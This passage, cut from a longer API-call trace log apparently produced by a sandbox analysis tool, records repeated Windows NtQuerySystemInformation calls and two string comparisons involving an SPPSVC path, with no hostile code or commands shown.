SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8c0, Length=0x20, ResultLength=0x0) [0285.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc90, Length=0x50, ResultLength=0x0) [0285.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc90, Length=0x50, ResultLength=0x0) [0285.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc90, Length=0x50, ResultLength=0x0) [0285.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db80, Length=0x50, ResultLength=0x0) [0285.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db80, Length=0x50, ResultLength=0x0) [0285.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db80, Length=0x50, ResultLength=0x0) [0285.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db80, Length=0x50, ResultLength=0x0) [0285.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dab0, Length=0x38, ResultLength=0x0) [0285.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8e0, Length=0x28, ResultLength=0x0) [0285.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8e0, Length=0x28, ResultLength=0x0) [0285.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8e0, Length=0x28, ResultLength=0x0) [0285.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d950, Length=0x28, ResultLength=0x0) [0285.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dab0, Length=0x38, ResultLength=0x0) [0285.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d9d0, Length=0x28, ResultLength=0x0) [0285.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d9d0, Length=0x28, ResultLength=0x0) [0285.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dab0, Length=0x38, ResultLength=0x0) [0285.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d930, Length=0x20, ResultLength=0x0) [0285.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8b0, Length=0x20, ResultLength=0x0) [0285.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8b0, Length=0x20, ResultLength=0x0) [0285.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8b0, Length=0x20, ResultLength=0x0) [0285.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dab0, Length=0x38, ResultLength=0x0) [0285.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d930, Length=0x20, ResultLength=0x0) [0285.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8c0, Length=0x20, ResultLength=0x0) [0285.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8c0, Length=0x20, ResultLength=0x0) [0285.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dd40, Length=0x50, ResultLength=0x0) [0285.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dcc0, Length=0x28, ResultLength=0x0) [0285.198] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0285.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dd40, Length=0x50, ResultLength=0x0) [0285.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dd40, Length=0x50, ResultLength=0x0) [0285.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dd40, Length=0x50, ResultLength=0x0) [0285.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc70, Length=0x38, ResultLength=0x0) [0285.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daa0, Length=0x28, ResultLength=0x0) [0285.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daa0, Length=0x28, ResultLength=0x0) [0285.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daa0, Length=0x28, ResultLength=0x0) [0285.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db10, Length=0x28, ResultLength=0x0) [0285.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc70, Length=0x38, ResultLength=0x0) [0285.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db90, Length=0x28, ResultLength=0x0) [0285.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db90, Length=0x28, ResultLength=0x0) [0285.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc70, Length=0x38, ResultLength=0x0) [0285.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daf0, Length=0x20, ResultLength=0x0) [0285.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da70, Length=0x20, ResultLength=0x0) [0285.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da70, Length=0x20, ResultLength=0x0) [0285.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da70, Length=0x20, ResultLength=0x0) [0285.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc70, Length=0x38, ResultLength=0x0) [0285.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daf0, Length=0x20, ResultLength=0x0) [0285.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da80, Length=0x20, ResultLength=0x0) [0285.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da80, Length=0x20, ResultLength=0x0) [0285.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dd40, Length=0x50, ResultLength=0x0) [0285.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dcc0, Length=0x28, ResultLength=0x0) [0285.215] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0285.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dd40, Length=0x50, ResultLength=0x0) [0285.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dd40, Length=0x50, ResultLength=0x0) [0285.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dd40, Length=0x50, ResultLength=0x0) [0285.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc70, Length=0x38, ResultLength=0x0) [0285.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daa0, Length=0x28, ResultLength=0x0) [0285.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daa0, Length=0x28, ResultLength=0x0) [0285.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daa0, Length=0x28, ResultLength=0x0) [0285.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db10, Length=0x28, ResultLength=0x0) [0285.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc70, Length=0x38, ResultLength=0x0) [0285.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db90, Length=0x28, ResultLength=0x0) [0285.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db90, Length=0x28, ResultLength=0x0) [0285.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc70, Length=0x38, ResultLength=0x0) [0285.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daf0, Length=0x20, ResultLength=0x0) [0285.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da70, Length=0x20, ResultLength=0x0) [0285.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da70, Length=0x20, ResultLength=0x0) [0285.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da70, Length=0x20, ResultLength=0x0) [0285.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc70, Length=0x38, ResultLength=0x0) [0285.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daf0, Length=0x20, ResultLength=0x0) [0285.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da80, Length=0x20, ResultLength=0x0) [0285.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da80, Length=0x20, ResultLength=0x0) [0285.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207e350, Length=0x40, ResultLength=0x0) [0285.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da40, Length=0x50, ResultLength=0x0) [0285.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da40, Length=0x50, ResultLength=0x0) [0285.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da40, Length=0x50, ResultLength=0x0) [0285.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d930, Length=0x50, ResultLength=0x0) [0285.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d930, Length=0x50, ResultLength=0x0) [0285.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d930, Length=0x50, ResultLength=0x0) [0285.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d930, Length=0x50, ResultLength=0x0) [0285.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d860, Length=0x38, ResultLength=0x0) [0285.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d690, Length=0x28, ResultLength=0x0) [0285.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d690, Length=0x28, ResultLength=0x0) [0285.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d690, Length=0x28, ResultLength=0x0) [0285.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d690, Length=0x28, ResultLength=0x0) [0285.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d700, Length=0x28, ResultLength=0x0) [0285.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d860, Length=0x38, ResultLength=0x0) [0285.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d780, Length=0x28, ResultLength=0x0) [0285.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d780, Length=0x28, ResultLength=0x0) [0285.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d620, Length=0x20, ResultLength=0x0) [0285.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d5a0, Length=0x20, ResultLength=0x0) [0285.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d5a0, Length=0x20, ResultLength=0x0) [0285.416] NtQuerySystemInformation 